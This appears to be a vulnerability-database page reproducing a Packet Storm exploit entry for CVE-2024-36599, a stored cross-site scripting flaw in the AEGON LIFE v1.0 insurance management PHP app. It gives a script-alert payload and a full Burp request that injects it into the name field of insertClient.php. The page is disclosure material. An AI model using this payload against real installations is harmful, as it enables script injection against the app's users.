Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAslam Anwar MahimkarPACKETSTORM:179088
HistoryJun 14, 2024 - 12:00 a.m.

AEGON LIFE 1.0 Cross Site Scripting

2024-06-1400:00:00
Aslam Anwar Mahimkar
packetstormsecurity.com
82
aegon life
stored xss
insertclient.

7.2 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.0%

JSON
`# Exploit Title: Life Insurance Management Stored System- cross-site scripting (XSS)  
# Exploit Author: Aslam Anwar Mahimkar  
# Date: 18-05-2024  
# Category: Web application  
# Vendor Homepage: https://projectworlds.in/  
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/  
# Version: AEGON LIFE v1.0  
# Tested on: Linux  
# CVE: CVE-2024-36599  
  
# Description:  
----------------  
  
A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.  
  
  
# Payload:  
----------------  
  
<script>alert(document.domain)</script>  
  
  
# Attack Vectors:  
-------------------------  
  
To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.  
  
# Burp Suite Request:  
----------------------------  
  
POST /lims/insertClient.php HTTP/1.1  
Host: localhost  
Content-Length: 30423  
Cache-Control: max-age=0  
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/lims/addClient.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n  
Connection: close  
  
------WebKitFormBoundarymKfAe0x95923LzQH  
Content-Disposition: form-data; name="client_id"  
  
1716051159  
  
------WebKitFormBoundarymKfAe0x95923LzQH  
Content-Disposition: form-data; name="client_password"  
  
password  
  
------WebKitFormBoundarymKfAe0x95923LzQH  
Content-Disposition: form-data; name="name"  
  
<script>alert(document.domain)</script>  
  
------WebKitFormBoundarymKfAe0x95923LzQH  
Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"  
  
Content-Type: application/octet-stream  
  
  
ÿØÿà  
  
`

Related

zdt 1
nvd 1
cvelist 1
cve 1
vulnrichment 1
exploitdb 1
zdt
zdt
AEGON LIFE v1.0 Life Insurance Management System - Stored cross-site scripting Vulnerability
2024-06-14 00:00:00
nvd
nvd
CVE-2024-36599
2024-06-14 18:15:27
cvelist
cvelist
CVE-2024-36599
2024-06-14 00:00:00
cve
cve
CVE-2024-36599
2024-06-14 18:15:27
vulnrichment
vulnrichment
CVE-2024-36599
2024-06-14 00:00:00
exploitdb
exploitdb
AEGON LIFE v1.0 Life Insurance Management System - Stored cross-site scripting (XSS)
2024-06-14 00:00:00

7.2 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.0%

JSON
Related for PACKETSTORM:179088
zdt1nvd1cvelist1cve1vulnrichment1exploitdb1